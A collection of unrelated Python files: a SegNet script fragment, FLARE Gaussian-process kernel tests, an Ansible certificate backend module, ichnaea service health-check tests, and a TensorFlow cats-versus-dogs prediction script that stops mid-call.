parser.add_argument("--weights", type=str, default="weights/SegNet_weights1625783040.5590682.pth", help="weights path")
parser.add_argument("--colors", type=int, default=[[0, 255, 0], [255, 0, 0],[0, 0, 255],[111, 74, 0],[70, 70, 70],[128, 64, 128],[0, 0, 0],[102, 102, 156],[190, 153, 153],[150, 100, 100],[107, 142, 35],
[152, 251, 152],[70, 130, 180],[220, 220, 0],[119, 11, 32],[215, 166, 66],[66, 88, 99],[154, 25, 244],[10, 155, 83]], help="mask")
parser.add_argument("--samples", type=str, default="samples//", help="path for sample")
parser.add_argument("--outputs", type=str, default="outputs//", help="path for output")
opt = parser.parse_args()
#print(opt)
CLASS_NUM = opt.class_num
WEIGHTS = opt.weights
COLORS = opt.colors
SAMPLES = opt.samples
OUTPUTS = opt.outputs
SegNet = SegNet(3, CLASS_NUM)
test(SegNet)
|
import time
import pytest
import numpy as np
import flare.gp_algebra
from flare import gp
from flare.env import AtomicEnvironment
from flare.struc import Structure
from flare.kernels.mc_simple import two_plus_three_body_mc, \
two_plus_three_body_mc_grad
from flare.kernels.mc_sephyps import two_plus_three_body_mc \
as two_plus_three_body_mc_multi
from flare.kernels.mc_sephyps import two_plus_three_body_mc_grad \
as two_plus_three_body_mc_grad_multi
from flare.gp_algebra import get_like_grad_from_mats, \
get_kernel_vector, get_ky_mat, \
get_ky_mat_update, get_ky_and_hyp
from .fake_gp import get_tstp
@pytest.fixture(scope='module')
def params():
parameters = get_random_training_set(10)
yield parameters
del parameters
def get_random_training_set(nenv):
"""Create a random training_set array with parameters
And generate four different kinds of hyperparameter sets:
* multi hypper parameters with two bond type and two triplet type
* constrained optimization, with noise parameter optimized
* constrained optimization, without noise parameter optimized
* simple hyper parameters without multihyps set up
"""
np.random.seed(0)
cutoffs = np.array([0.8, 0.8])
hyps = np.ones(5, dtype=float)
kernel = (two_plus_three_body_mc, two_plus_three_body_mc_grad)
kernel_m = (two_plus_three_body_mc_multi, two_plus_three_body_mc_grad_multi)
# 9 different hyper-parameters
hyps_mask1 = {'nspec': 2,
'spec_mask': np.zeros(118, dtype=int),
'nbond': 2,
'bond_mask': np.array([0, 1, 1, 1]),
'triplet_mask': np.array([0, 1, 1, 1, 1, 1, 1, 1]),
'ntriplet': 2}
hyps_mask1['spec_mask'][2] = 1
hyps1 = np.ones(9, dtype=float)
# 9 different hyper-parameters, onlye train the 0, 2, 4, 6, 8
hyps_mask2 = {'nspec': 2,
'spec_mask': np.zeros(118, dtype=int),
'nbond': 2,
'bond_mask': np.array([0, 1, 1, 1]),
'ntriplet': 2,
'triplet_mask': np.array([0, 1, 1, 1, 1, 1, 1, 1]),
'train_noise':True,
'map':[0,2,4,6,8],
'original':np.array([1, 1, 1, 1, 1, 1, 1, 1, 1])}
hyps_mask2['spec_mask'][2] = 1
hyps2 = np.ones(5, dtype=float)
# 9 different hyper-parameters, only train the 0, 2, 4, 6
hyps_mask3 = {'nspec': 2,
'spec_mask': np.zeros(118, dtype=int),
'nbond': 2,
'bond_mask': np.array([0, 1, 1, 1]),
'ntriplet': 2,
'triplet_mask': np.array([0, 1, 1, 1, 1, 1, 1, 1]),
'train_noise':False,
'map':[0,2,4,6],
'original':np.array([1, 1, 1, 1, 1, 1, 1, 1, 1])}
hyps_mask3['spec_mask'][2] = 1
hyps3 = np.ones(4, dtype=float)
# 5 different hyper-parameters, equivalent to no multihyps
hyps_mask4 = {'nspec': 1,
'spec_mask': np.zeros(118, dtype=int),
'nbond': 1,
'bond_mask': np.array([0]),
'ntriplet': 1,
'triplet_mask': np.array([0])}
hyps4 = np.ones(5, dtype=float)
hyps_list = [hyps1, hyps2, hyps3, hyps4, hyps]
hyps_mask_list = [hyps_mask1, hyps_mask2, hyps_mask3, hyps_mask4, None]
# create test data
cell = np.eye(3)
unique_species = [2, 1]
noa = 5
training_data = []
training_labels = []
for idenv in range(nenv):
positions = np.random.uniform(-1, 1, [noa,3])
species = np.random.randint(0, len(unique_species), noa)
struc = Structure(cell, species, positions)
training_data += [AtomicEnvironment(struc, 1, cutoffs)]
training_labels += [np.random.uniform(-1, 1, 3)]
training_labels = np.hstack(training_labels)
# store it as global variables
name = "unit_test"
flare.gp_algebra._global_training_data[name] = training_data
flare.gp_algebra._global_training_labels[name] = training_labels
return hyps, name, kernel, cutoffs, \
kernel_m, hyps_list, hyps_mask_list
def test_ky_mat(params):
"""
test function get_ky_mat in gp_algebra, gp_algebra_multi
using gp_algebra_origin as reference
TO DO: store the reference... and call it explicitely
"""
hyps, name, kernel, cutoffs, \
kernel_m, hyps_list, hyps_mask_list = params
# get the reference
# without multi hyps
time0 = time.time()
ky_mat0 = get_ky_mat(hyps, name, kernel[0], cutoffs)
print("compute ky_mat serial", time.time()-time0)
# parallel version
time0 = time.time()
ky_mat = get_ky_mat(hyps, name,
kernel[0], cutoffs,
n_cpus=2, n_sample=20)
print("compute ky_mat parallel", time.time()-time0)
diff = (np.max(np.abs(ky_mat-ky_mat0)))
assert (diff==0), "parallel implementation is wrong"
# this part of the code can be use for timing the parallel performance
# for n in [10, 50, 100]:
# timer0 = time.time()
# ky_mat = get_ky_mat(hyps, name,
# kernel[0], cutoffs,
# ncpus=8, n_sample=n)
# diff = (np.max(np.abs(ky_mat-ky_mat0)))
# print("parallel", n, time.time()-timer0, diff)
# assert (diff==0), "parallel implementation is wrong"
# check multi hyps implementation
# compute the ky_mat with different parameters
for i in range(len(hyps_list)):
hyps = hyps_list[i]
hyps_mask = hyps_mask_list[i]
if hyps_mask is None:
ker = kernel[0]
else:
ker = kernel_m[0]
# serial implementation
time0 = time.time()
ky_mat = get_ky_mat(hyps, name,
ker, cutoffs, hyps_mask)
print(f"compute ky_mat with multihyps, test {i}, n_cpus=1", time.time()-time0)
diff = (np.max(np.abs(ky_mat-ky_mat0)))
assert (diff==0), "multi hyps implementation is wrong"\
f"with case {i}"
# parallel implementation
time0 = time.time()
ky_mat = get_ky_mat(hyps, name,
ker,
cutoffs, hyps_mask, n_cpus=2, n_sample=20)
print(f"compute ky_mat with multihyps, test {i}, n_cpus=2", time.time()-time0)
diff = (np.max(np.abs(ky_mat-ky_mat0)))
assert (diff==0), "multi hyps parallel "\
"implementation is wrong"\
f"with case {i}"
def test_ky_mat_update(params):
"""
check ky_mat_update function
"""
hyps, name, kernel, cutoffs, \
kernel_m, hyps_list, hyps_mask_list = params
# prepare old data set as the starting point
n = 5
training_data = flare.gp_algebra._global_training_data[name]
flare.gp_algebra._global_training_data['old'] = training_data[:n]
training_labels = flare.gp_algebra._global_training_labels[name]
flare.gp_algebra._global_training_labels['old'] = training_labels[:n]
func = [get_ky_mat,
get_ky_mat_update]
# get the reference
ky_mat0 = func[0](hyps, name,
kernel[0], cutoffs)
ky_mat_old = func[0](hyps, 'old',
kernel[0], cutoffs)
# update
ky_mat = func[1](ky_mat_old, hyps, name,
kernel[0], cutoffs)
diff = (np.max(np.abs(ky_mat-ky_mat0)))
assert (diff==0), "update function is wrong"
# parallel version
ky_mat = func[1](ky_mat_old, hyps, name,
kernel[0], cutoffs,
n_cpus=2, n_sample=20)
diff = (np.max(np.abs(ky_mat-ky_mat0)))
assert (diff==0), "parallel implementation is wrong"
# check multi hyps implementation
for i in range(len(hyps_list)):
hyps = hyps_list[i]
hyps_mask = hyps_mask_list[i]
if hyps_mask is None:
ker = kernel[0]
else:
ker = kernel_m[0]
# serial implementation
ky_mat = func[1](ky_mat_old, hyps, name,
ker, cutoffs, hyps_mask)
diff = (np.max(np.abs(ky_mat-ky_mat0)))
assert (diff<1e-12), "multi hyps parameter implementation is wrong"
# parallel implementation
ky_mat = func[1](ky_mat_old, hyps, name,
ker, cutoffs,
hyps_mask, n_cpus=2, n_sample=20)
diff = (np.max(np.abs(ky_mat-ky_mat0)))
assert (diff<1e-12), "multi hyps parameter parallel "\
"implementation is wrong"
def test_get_kernel_vector(params):
hyps, name, kernel, cutoffs, \
kernel_m, hyps_list, hyps_mask_list = params
test_point = get_tstp()
size = len(flare.gp_algebra._global_training_data[name])
# test the parallel implementation for multihyps
vec = get_kernel_vector(name, kernel_m[0],
test_point, 1, hyps,
cutoffs, hyps_mask_list[0])
vec_par = get_kernel_vector(name, kernel_m[0],
test_point, 1, hyps,
cutoffs, hyps_mask_list[0],
n_cpus=2, n_sample=100)
assert (all(np.equal(vec, vec_par))), "parallel implementation is wrong"
assert (vec.shape[0] == size*3), \
f"{vec} {size}"
def test_ky_and_hyp(params):
hyps, name, kernel, cutoffs, \
kernel_m, hyps_list, hyps_mask_list = params
hypmat_0, ky_mat0 = get_ky_and_hyp(hyps, name,
kernel[1], cutoffs)
# parallel version
hypmat, ky_mat = get_ky_and_hyp(hyps, name,
kernel[1], cutoffs, n_cpus=2)
diff = (np.max(np.abs(ky_mat-ky_mat0)))
assert (diff==0), "parallel implementation is wrong"
# check all cases
for i in range(len(hyps_list)):
hyps = hyps_list[i]
hyps_mask = hyps_mask_list[i]
if hyps_mask is None:
ker = kernel[1]
else:
ker = kernel_m[1]
# serial implementation
hypmat, ky_mat = get_ky_and_hyp(
hyps, name, ker, cutoffs, hyps_mask)
if (i == 0):
hypmat9 = hypmat
diff = (np.max(np.abs(ky_mat-ky_mat0)))
assert (diff==0), "multi hyps parameter implementation is wrong"
# compare to no hyps_mask version
diff = 0
if (i == 1):
diff = (np.max(np.abs(hypmat-hypmat9[[0,2,4,6,8], :, :])))
elif (i==2):
diff = (np.max(np.abs(hypmat-hypmat9[[0,2,4,6], :, :])))
elif (i==3):
diff = (np.max(np.abs(hypmat-hypmat_0)))
elif (i==4):
diff = (np.max(np.abs(hypmat-hypmat_0)))
assert (diff==0), "multi hyps implementation is wrong"\
f"in case {i}"
# parallel implementation
hypmat_par, ky_mat_par = get_ky_and_hyp(hyps, name,
ker, cutoffs, hyps_mask,
n_cpus=2, n_sample=2)
# compare to serial implementation
diff = (np.max(np.abs(ky_mat-ky_mat_par)))
assert (diff==0), f"multi hyps parallel "\
f"implementation is wrong in case {i}"
diff = (np.max(np.abs(hypmat_par-hypmat)))
assert (diff==0), f"multi hyps parallel implementation is wrong"\
f" in case{i}"
def test_grad(params):
hyps, name, kernel, cutoffs, \
kernel_m, hyps_list, hyps_mask_list = params
# obtain reference
func = get_ky_and_hyp
hyp_mat, ky_mat = func(hyps, name,
kernel[1], cutoffs)
like0, like_grad0 = \
get_like_grad_from_mats(ky_mat, hyp_mat, name)
# serial implementation
func = get_ky_and_hyp
hyp_mat, ky_mat = func(hyps, name,
kernel[1], cutoffs)
like, like_grad = \
get_like_grad_from_mats(ky_mat, hyp_mat, name)
assert (like==like0), "wrong likelihood"
assert np.max(np.abs(like_grad-like_grad0))==0, "wrong likelihood"
func = get_ky_and_hyp
for i in range(len(hyps_list)):
hyps = hyps_list[i]
hyps_mask = hyps_mask_list[i]
if hyps_mask is None:
ker = kernel[1]
else:
ker = kernel_m[1]
hyp_mat, ky_mat = func(hyps, name,
ker, cutoffs, hyps_mask)
like, like_grad = \
get_like_grad_from_mats(ky_mat, hyp_mat, name)
assert (like==like0), "wrong likelihood"
if (i==0):
like_grad9 = like_grad
diff = 0
if (i==1):
diff = (np.max(np.abs(like_grad-like_grad9[[0,2,4,6,8]])))
elif (i==2):
diff = (np.max(np.abs(like_grad-like_grad9[[0,2,4,6]])))
elif (i==3):
diff = (np.max(np.abs(like_grad-like_grad0)))
elif (i==4):
diff = (np.max(np.abs(like_grad-like_grad0)))
assert (diff==0), "multi hyps implementation is wrong"\
f"in case {i}"
def test_ky_hyp_grad(params):
hyps, name, kernel, cutoffs, \
kernel_m, hyps_list, hyps_mask_list = params
func = get_ky_and_hyp
hyp_mat, ky_mat = func(hyps, name,
kernel[1], cutoffs)
size = len(flare.gp_algebra._global_training_data[name])
like, like_grad = \
get_like_grad_from_mats(ky_mat, hyp_mat, name)
delta = 0.001
for i in range(len(hyps)):
newhyps = np.copy(hyps)
newhyps[i] += delta
hyp_mat_p, ky_mat_p = func(newhyps, name,
kernel[1], cutoffs)
like_p, like_grad_p = \
get_like_grad_from_mats(ky_mat_p, hyp_mat_p, name)
newhyps[i] -= 2*delta
hyp_mat_m, ky_mat_m = func(newhyps, name,
kernel[1], cutoffs)
like_m, like_grad_m = \
get_like_grad_from_mats(ky_mat_m, hyp_mat_m, name)
diff = np.abs(like_grad[i]-(like_p-like_m)/2./delta)
assert (diff < 1e-3), "wrong calculation of hyp_mat"
|
<reponame>usegalaxy-no/usegalaxy<gh_stars>1-10
# -*- coding: utf-8 -*-
# Copyright: (c) 2016-2017, <NAME> <<EMAIL>>
# Copyright: (c) 2017, <NAME> <<EMAIL>>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import abc
import traceback
from distutils.version import LooseVersion
from ansible.module_utils import six
from ansible.module_utils.basic import missing_required_lib
from ansible_collections.community.crypto.plugins.module_utils.crypto.module_backends.common import ArgumentSpec
from ansible_collections.community.crypto.plugins.module_utils.crypto.basic import (
OpenSSLObjectError,
OpenSSLBadPassphraseError,
)
from ansible_collections.community.crypto.plugins.module_utils.crypto.support import (
load_privatekey,
load_certificate,
load_certificate_request,
)
from ansible_collections.community.crypto.plugins.module_utils.crypto.cryptography_support import (
cryptography_compare_public_keys,
)
from ansible_collections.community.crypto.plugins.module_utils.crypto.module_backends.certificate_info import (
get_certificate_info,
)
MINIMAL_CRYPTOGRAPHY_VERSION = '1.6'
MINIMAL_PYOPENSSL_VERSION = '0.15'
PYOPENSSL_IMP_ERR = None
try:
import OpenSSL
from OpenSSL import crypto
PYOPENSSL_VERSION = LooseVersion(OpenSSL.__version__)
except ImportError:
PYOPENSSL_IMP_ERR = traceback.format_exc()
PYOPENSSL_FOUND = False
else:
PYOPENSSL_FOUND = True
CRYPTOGRAPHY_IMP_ERR = None
CRYPTOGRAPHY_VERSION = None
try:
import cryptography
from cryptography import x509
CRYPTOGRAPHY_VERSION = LooseVersion(cryptography.__version__)
except ImportError:
CRYPTOGRAPHY_IMP_ERR = traceback.format_exc()
CRYPTOGRAPHY_FOUND = False
else:
CRYPTOGRAPHY_FOUND = True
class CertificateError(OpenSSLObjectError):
pass
@six.add_metaclass(abc.ABCMeta)
class CertificateBackend(object):
def __init__(self, module, backend):
self.module = module
self.backend = backend
self.force = module.params['force']
self.privatekey_path = module.params['privatekey_path']
self.privatekey_content = module.params['privatekey_content']
if self.privatekey_content is not None:
self.privatekey_content = self.privatekey_content.encode('utf-8')
self.privatekey_passphrase = module.params['privatekey_passphrase']
self.csr_path = module.params['csr_path']
self.csr_content = module.params['csr_content']
if self.csr_content is not None:
self.csr_content = self.csr_content.encode('utf-8')
# The following are default values which make sure check() works as
# before if providers do not explicitly change these properties.
self.create_subject_key_identifier = 'never_create'
self.create_authority_key_identifier = False
self.privatekey = None
self.csr = None
self.cert = None
self.existing_certificate = None
self.existing_certificate_bytes = None
self.check_csr_subject = True
self.check_csr_extensions = True
self.diff_before = self._get_info(None)
self.diff_after = self._get_info(None)
def _get_info(self, data):
if data is None:
return dict()
try:
result = get_certificate_info(self.module, self.backend, data, prefer_one_fingerprint=True)
result['can_parse_certificate'] = True
return result
except Exception as exc:
return dict(can_parse_certificate=False)
@abc.abstractmethod
def generate_certificate(self):
"""(Re-)Generate certificate."""
pass
@abc.abstractmethod
def get_certificate_data(self):
"""Return bytes for self.cert."""
pass
def set_existing(self, certificate_bytes):
"""Set existing certificate bytes. None indicates that the key does not exist."""
self.existing_certificate_bytes = certificate_bytes
self.diff_after = self.diff_before = self._get_info(self.existing_certificate_bytes)
def has_existing(self):
"""Query whether an existing certificate is/has been there."""
return self.existing_certificate_bytes is not None
def _ensure_private_key_loaded(self):
"""Load the provided private key into self.privatekey."""
if self.privatekey is not None:
return
if self.privatekey_path is None and self.privatekey_content is None:
return
try:
self.privatekey = load_privatekey(
path=self.privatekey_path,
content=self.privatekey_content,
passphrase=self.privatekey_passphrase,
backend=self.backend,
)
except OpenSSLBadPassphraseError as exc:
raise CertificateError(exc)
def _ensure_csr_loaded(self):
"""Load the CSR into self.csr."""
if self.csr is not None:
return
if self.csr_path is None and self.csr_content is None:
return
self.csr = load_certificate_request(
path=self.csr_path,
content=self.csr_content,
backend=self.backend,
)
def _ensure_existing_certificate_loaded(self):
"""Load the existing certificate into self.existing_certificate."""
if self.existing_certificate is not None:
return
if self.existing_certificate_bytes is None:
return
self.existing_certificate = load_certificate(
path=None,
content=self.existing_certificate_bytes,
backend=self.backend,
)
def _check_privatekey(self):
"""Check whether provided parameters match, assuming self.existing_certificate and self.privatekey have been populated."""
if self.backend == 'pyopenssl':
ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_2_METHOD)
ctx.use_privatekey(self.privatekey)
ctx.use_certificate(self.existing_certificate)
try:
ctx.check_privatekey()
return True
except OpenSSL.SSL.Error:
return False
elif self.backend == 'cryptography':
return cryptography_compare_public_keys(self.existing_certificate.public_key(), self.privatekey.public_key())
def _check_csr(self):
"""Check whether provided parameters match, assuming self.existing_certificate and self.csr have been populated."""
if self.backend == 'pyopenssl':
# Verify that CSR is signed by certificate's private key
try:
self.csr.verify(self.existing_certificate.get_pubkey())
except OpenSSL.crypto.Error:
return False
# Check subject
if self.check_csr_subject and self.csr.get_subject() != self.existing_certificate.get_subject():
return False
# Check extensions
if not self.check_csr_extensions:
return True
csr_extensions = self.csr.get_extensions()
cert_extension_count = self.existing_certificate.get_extension_count()
if len(csr_extensions) != cert_extension_count:
return False
for extension_number in range(0, cert_extension_count):
cert_extension = self.existing_certificate.get_extension(extension_number)
csr_extension = filter(lambda extension: extension.get_short_name() == cert_extension.get_short_name(), csr_extensions)
if cert_extension.get_data() != list(csr_extension)[0].get_data():
return False
return True
elif self.backend == 'cryptography':
# Verify that CSR is signed by certificate's private key
if not self.csr.is_signature_valid:
return False
if not cryptography_compare_public_keys(self.csr.public_key(), self.existing_certificate.public_key()):
return False
# Check subject
if self.check_csr_subject and self.csr.subject != self.existing_certificate.subject:
return False
# Check extensions
if not self.check_csr_extensions:
return True
cert_exts = list(self.existing_certificate.extensions)
csr_exts = list(self.csr.extensions)
if self.create_subject_key_identifier != 'never_create':
# Filter out SubjectKeyIdentifier extension before comparison
cert_exts = list(filter(lambda x: not isinstance(x.value, x509.SubjectKeyIdentifier), cert_exts))
csr_exts = list(filter(lambda x: not isinstance(x.value, x509.SubjectKeyIdentifier), csr_exts))
if self.create_authority_key_identifier:
# Filter out AuthorityKeyIdentifier extension before comparison
cert_exts = list(filter(lambda x: not isinstance(x.value, x509.AuthorityKeyIdentifier), cert_exts))
csr_exts = list(filter(lambda x: not isinstance(x.value, x509.AuthorityKeyIdentifier), csr_exts))
if len(cert_exts) != len(csr_exts):
return False
for cert_ext in cert_exts:
try:
csr_ext = self.csr.extensions.get_extension_for_oid(cert_ext.oid)
if cert_ext != csr_ext:
return False
except cryptography.x509.ExtensionNotFound as dummy:
return False
return True
def _check_subject_key_identifier(self):
"""Check whether Subject Key Identifier matches, assuming self.existing_certificate has been populated."""
if self.backend != 'cryptography':
# We do not support SKI with pyOpenSSL backend
return True
# Get hold of certificate's SKI
try:
ext = self.existing_certificate.extensions.get_extension_for_class(x509.SubjectKeyIdentifier)
except cryptography.x509.ExtensionNotFound as dummy:
return False
# Get hold of CSR's SKI for 'create_if_not_provided'
csr_ext = None
if self.create_subject_key_identifier == 'create_if_not_provided':
try:
csr_ext = self.csr.extensions.get_extension_for_class(x509.SubjectKeyIdentifier)
except cryptography.x509.ExtensionNotFound as dummy:
pass
if csr_ext is None:
# If CSR had no SKI, or we chose to ignore it ('always_create'), compare with created SKI
if ext.value.digest != x509.SubjectKeyIdentifier.from_public_key(self.existing_certificate.public_key()).digest:
return False
else:
# If CSR had SKI and we didn't ignore it ('create_if_not_provided'), compare SKIs
if ext.value.digest != csr_ext.value.digest:
return False
return True
def needs_regeneration(self):
"""Check whether a regeneration is necessary."""
if self.force or self.existing_certificate_bytes is None:
return True
try:
self._ensure_existing_certificate_loaded()
except Exception as dummy:
return True
# Check whether private key matches
self._ensure_private_key_loaded()
if self.privatekey is not None and not self._check_privatekey():
return True
# Check whether CSR matches
self._ensure_csr_loaded()
if self.csr is not None and not self._check_csr():
return True
# Check SubjectKeyIdentifier
if self.create_subject_key_identifier != 'never_create' and not self._check_subject_key_identifier():
return True
return False
def dump(self, include_certificate):
"""Serialize the object into a dictionary."""
result = {
'privatekey': self.privatekey_path,
'csr': self.csr_path
}
# Get hold of certificate bytes
certificate_bytes = self.existing_certificate_bytes
if self.cert is not None:
certificate_bytes = self.get_certificate_data()
self.diff_after = self._get_info(certificate_bytes)
if include_certificate:
# Store result
result['certificate'] = certificate_bytes.decode('utf-8') if certificate_bytes else None
result['diff'] = dict(
before=self.diff_before,
after=self.diff_after,
)
return result
@six.add_metaclass(abc.ABCMeta)
class CertificateProvider(object):
@abc.abstractmethod
def validate_module_args(self, module):
"""Check module arguments"""
@abc.abstractmethod
def needs_version_two_certs(self, module):
"""Whether the provider needs to create a version 2 certificate."""
def needs_pyopenssl_get_extensions(self, module):
"""Whether the provider needs to use get_extensions() with pyOpenSSL."""
return True
@abc.abstractmethod
def create_backend(self, module, backend):
"""Create an implementation for a backend.
Return value must be instance of CertificateBackend.
"""
def select_backend(module, backend, provider):
"""
:type module: AnsibleModule
:type backend: str
:type provider: CertificateProvider
"""
provider.validate_module_args(module)
backend = module.params['select_crypto_backend']
if backend == 'auto':
# Detect what backend we can use
can_use_cryptography = CRYPTOGRAPHY_FOUND and CRYPTOGRAPHY_VERSION >= LooseVersion(MINIMAL_CRYPTOGRAPHY_VERSION)
can_use_pyopenssl = PYOPENSSL_FOUND and PYOPENSSL_VERSION >= LooseVersion(MINIMAL_PYOPENSSL_VERSION)
# If cryptography is available we'll use it
if can_use_cryptography:
backend = 'cryptography'
elif can_use_pyopenssl:
backend = 'pyopenssl'
if provider.needs_version_two_certs(module):
module.warn('crypto backend forced to pyopenssl. The cryptography library does not support v2 certificates')
backend = 'pyopenssl'
# Fail if no backend has been found
if backend == 'auto':
module.fail_json(msg=("Can't detect any of the required Python libraries "
"cryptography (>= {0}) or PyOpenSSL (>= {1})").format(
MINIMAL_CRYPTOGRAPHY_VERSION,
MINIMAL_PYOPENSSL_VERSION))
if backend == 'pyopenssl':
module.deprecate('The module is using the PyOpenSSL backend. This backend has been deprecated',
version='2.0.0', collection_name='community.crypto')
if not PYOPENSSL_FOUND:
module.fail_json(msg=missing_required_lib('pyOpenSSL >= {0}'.format(MINIMAL_PYOPENSSL_VERSION)),
exception=PYOPENSSL_IMP_ERR)
if provider.needs_pyopenssl_get_extensions(module):
try:
getattr(crypto.X509Req, 'get_extensions')
except AttributeError:
module.fail_json(msg='You need to have PyOpenSSL>=0.15')
elif backend == 'cryptography':
if not CRYPTOGRAPHY_FOUND:
module.fail_json(msg=missing_required_lib('cryptography >= {0}'.format(MINIMAL_CRYPTOGRAPHY_VERSION)),
exception=CRYPTOGRAPHY_IMP_ERR)
if provider.needs_version_two_certs(module):
module.fail_json(msg='The cryptography backend does not support v2 certificates, '
'use select_crypto_backend=pyopenssl for v2 certificates')
return provider.create_backend(module, backend)
def get_certificate_argument_spec():
return ArgumentSpec(
argument_spec=dict(
provider=dict(type='str', choices=[]), # choices will be filled by add_XXX_provider_to_argument_spec() in certificate_xxx.py
force=dict(type='bool', default=False,),
csr_path=dict(type='path'),
csr_content=dict(type='str'),
select_crypto_backend=dict(type='str', default='auto', choices=['auto', 'cryptography', 'pyopenssl']),
# General properties of a certificate
privatekey_path=dict(type='path'),
privatekey_content=dict(type='str', no_log=True),
privatekey_passphrase=dict(type='str', no_log=True),
),
mutually_exclusive=[
['csr_path', 'csr_content'],
['privatekey_path', 'privatekey_content'],
],
)
|
<gh_stars>0
from ichnaea.geoip import GeoIPNull
from ichnaea.log import PingableStatsClient
from ichnaea.tests.base import (
_make_db,
_make_redis,
AppTestCase,
)
class TestHeartbeat(AppTestCase):
def test_ok(self):
app = self.app
res = app.get('/__heartbeat__', status=200)
self.assertEqual(res.content_type, 'application/json')
self.assertEqual(res.json['status'], 'OK')
class TestDatabaseHeartbeat(AppTestCase):
def test_database_error(self):
# self.app is a class variable, so we keep this test in
# its own class to avoid isolation problems
app = self.app
# create a database connection to the discard port
self.app.app.registry.db_ro = _make_db(
uri='mysql+pymysql://none:none@127.0.0.1:9/test_location')
res = app.get('/__heartbeat__', status=200)
self.assertEqual(res.content_type, 'application/json')
self.assertEqual(res.json['status'], 'OK')
class TestMonitor(AppTestCase):
def test_ok(self):
app = self.app
response = app.get('/__monitor__', status=200)
self.assertEqual(response.content_type, 'application/json')
data = response.json
timed_services = set(['database', 'geoip', 'redis', 'stats'])
self.assertEqual(set(data.keys()), timed_services)
for name in timed_services:
self.assertEqual(data[name]['up'], True)
self.assertTrue(isinstance(data[name]['time'], int))
self.assertTrue(data[name]['time'] >= 0)
self.assertTrue(1 < data['geoip']['age_in_days'] < 1000)
class TestMonitorErrors(AppTestCase):
def setUp(self):
super(TestMonitorErrors, self).setUp()
# create database connections to the discard port
db_uri = 'mysql+pymysql://none:none@127.0.0.1:9/none'
self.broken_db = _make_db(uri=db_uri)
self.app.app.registry.db_rw = self.broken_db
self.app.app.registry.db_ro = self.broken_db
# create broken geoip db
self.app.app.registry.geoip_db = GeoIPNull()
# create broken redis connection
redis_uri = 'redis://127.0.0.1:9/15'
self.broken_redis = _make_redis(redis_uri)
self.app.app.registry.redis_client = self.broken_redis
# create broken stats client
self.broken_stats = PingableStatsClient(host='127.0.0.1', port=0)
self.app.app.registry.stats_client = self.broken_stats
def tearDown(self):
super(TestMonitorErrors, self).tearDown()
del self.broken_db
self.broken_redis.connection_pool.disconnect()
del self.broken_redis
del self.broken_stats
def test_database_error(self):
res = self.app.get('/__monitor__', status=503)
self.assertEqual(res.content_type, 'application/json')
self.assertEqual(res.json['database'], {'up': False, 'time': 0})
def test_geoip_error(self):
res = self.app.get('/__monitor__', status=503)
self.assertEqual(res.content_type, 'application/json')
self.assertEqual(res.json['geoip'],
{'up': False, 'time': 0, 'age_in_days': -1})
def test_redis_error(self):
res = self.app.get('/__monitor__', status=503)
self.assertEqual(res.content_type, 'application/json')
self.assertEqual(res.json['redis'], {'up': False, 'time': 0})
def test_stats_error(self):
res = self.app.get('/__monitor__', status=503)
self.assertEqual(res.content_type, 'application/json')
self.assertEqual(res.json['stats'], {'up': False, 'time': 0})
|
<gh_stars>0
import glob
import os
import re
import pathlib
import PIL
# next line is to limit tensorflow verbose output
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
import numpy as np
from tensorflow.keras.models import load_model
CONST_MODEL_PATH = 'trained_models/tf2_model_cnn_transfer_learning_mobilenet-v2_with_data_augmentation_classifier'
CONST_CLASS_NAMES = ['cats', 'dogs']
CONST_IMAGE_SIZE = (160, 160)
CONST_NEW_IMAGES = 'unseen_test_samples/cats_dogs'
# Normalisation is not needed here , because it is integrated in the first layer of model :
# layers.experimental.preprocessing.Rescaling(1. / 255, input_shape=(img_height, img_width, 3)),
CONST_IMAGE_RESCALE = 1.0
def make_images_predictions_from_retrained_model(path_to_images, path_to_model, class_list, image_size,
normalization_factor):
print('# Tensorflow version : {}'.format(tf.__version__))
print('# Loading model already fitted.')
print("### will try to load model from path : {}".format(path_to_model))
model = load_model(path_to_model)
# probability_model = tf.keras.Sequential([model, tf.keras.layers.Softmax()])
probability_model = model
print("### Now trying model.predict with a brand new set of images !")
test_images_path = []
for image_path in glob.glob('{}/*.jpeg'.format(path_to_images)):
test_images_path.append(image_path)
test_images_path.sort()
print("# found {} images in path : {} ".format(len(test_images_path), path_to_images))
num_correct_predictions = 0
num_wrong_predictions = 0
num_ignored_images = 0
for image_path in test_images_path:
test_image = tf.keras.preprocessing.image.load_img(image_path,
color_mode='rgb',
target_size=image_size,
interpolation='nearest')
# print('test_image shape : {}'.format(np.shape(test_image)))
# REMEMBER TO 'NORMALIZE' YOUR DATA !
test_image_normalized = np.asarray(test_image) * normalization_factor
# print('test_image_normalized shape : {}'.format(np.shape(test_image_normalized)))
test_image_normalized_arr = np.expand_dims(test_image_normalized, 0)
# print('test_image_normalized_arr shape : {}'.format(np.shape(test_image_normalized_arr)))
filename = os.path.basename(image_path)
filename_without_ext = os.path.splitext(filename)[0]
image_real_class_name = re.split(r'\d+', filename_without_ext)[0]
try:
image_real_class = class_list.index(image_real_class_name)
predictions_single = probability_model.predict(test_image_normalized_arr)
res = predictions_single[0]
# Apply a sigmoid since our model returns logits
predictions = tf.nn.sigmoid(res)
predictions = tf.where(predictions < 0.5, 0, 1)
# print('Predictions:\n', predictions.numpy())
predicted_class = predictions.numpy()[0]
predicted_class_name = class_list[predicted_class.item()]
if predicted_class == image_real_class:
num_correct_predictions += 1
print('# ✅ ✅ prediction for {} is CORRECT {} = {:10} '.format(
filename, predicted_class, predicted_class_name))
else:
num_wrong_predictions += 1
print('# ❌ ❌ prediction for {} is WRONG {} = {:10}'.format(
filename, predicted_class, predicted_class_name))
except ValueError as e:
num_ignored_images += 1
print('WARNING : Image name {} is not in the given categories'.format(filename))
print('WARNING : Image name {} will not be in the test set !'.format(filename))
print('Exception : {}'.format(e))
print('=' * 80)
print('{} CORRECT PREDICTIONS, {} WRONG PREDICTIONS'.format(num_correct_predictions, num_wrong_predictions))
total = num_correct_predictions + num_wrong_predictions
if total > 0:
percent_success = (num_correct_predictions / total) * 100
print('{:2.2f}% percent success !'.format(percent_success))
if __name__ == '__main__':
print('# REUSING A Mobile Net V2 model modified with transfer learning on cats and dogs ')
print(" # Cats and dogs categories are obviously : \n{}".format(CONST_CLASS_NAMES))
make_images_predictions_from_retrained_model(
